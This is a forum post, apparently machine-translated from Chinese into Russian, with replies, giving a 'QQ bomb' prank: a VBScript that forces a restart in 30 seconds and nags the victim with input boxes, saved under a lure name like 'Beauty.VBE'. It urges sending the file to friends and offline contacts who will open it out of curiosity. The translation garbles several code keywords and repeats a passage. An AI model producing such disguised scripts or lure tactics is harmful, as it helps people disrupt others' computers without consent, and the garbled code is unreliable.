<Су поделился>В честь создания позиционной системы «Цинчэн» выпущен простой метод изготовления бомбы QQ.
Торжественно заявляю: этот метод предназначен исключительно для развлечения. Пожалуйста, не используйте его для незаконных действий, иначе вы будете нести ответственность за последствия! Первый шаг: скопируйте следующий код в блокнот. при ошибке возобновить nextdim WSHshellAset WSHshellA = wscript. createobject("wscript.shell") WSHshellA. запустите "cmd.exe /c Shutdown -r -t 30 -c ""Быстро скажите мне, что 7723 - лучший. Если вы не скажете мне, я выключу ваш компьютер через 30 секунд. Если вы мне не верите, попробуйте ***""", 0, truedim ado while (a<>"7723 - лучший") a = inputbox ("Скажите 7723 - лучший, поторопитесь, скажите ""7723 - лучший" "", "Скажи или не говори", "Не говори", 8000, 7000) msgbox chr (13) chr (13) chr (13) a, 0, "MsgBox" Текст над циклом можно изменить по желанию, без каких-либо впечатлений. Если вы отправите это ММ, вы сможете заставить ее сказать: «Я люблю тебя». Суть метода в том, что указанное выше значение 7723 можно изменить по своему желанию, не влияя на эффект. Второй шаг — переименовать файл блокнота в ***. Простая QQ-бомба типа VBE (имя файла может быть произвольным, например «Beauty. VBE»). Если кто-нибудь запустит эту бомбу QQ, она автоматически отключится через 30 секунд. Давайте поговорим о том, как его использовать: Самый простой способ его использовать — отправить его прямо своему другу и позволить ему запустить, и тогда его обманут. Есть еще одна, еще более порочная вещь. Вы можете отправлять автономные файлы QQ друзьям QQ, которые не в сети. Почти 80% людей заинтересуются, что это за файл, и в замешательстве откроют его. После того, как вы откроете его, вас разыграет бомба QQ. Вы также можете проверить мощность этой бомбы QQ. Второй шаг — переименовать файл блокнота в ***. Простая QQ-бомба типа VBE (имя файла может быть произвольным, например «Beauty. VBE»). Если кто-нибудь запустит эту бомбу QQ, она автоматически отключится через 30 секунд. Вы также можете проверить мощность этой бомбы QQ самостоятельно. После изучения не забудьте ответить. (Если другая сторона отправит его вам, введите «shutdown -a», чтобы взломать его).
Ответы (5)
Брат на диване сел
Не понял..
Я узнал об этом очень рано, но я написал это на языке Easy Language.
那个……как найти файл блокнота? И будет ли он опасен для телефона?
Хороший пост..
— Все ответы загружены —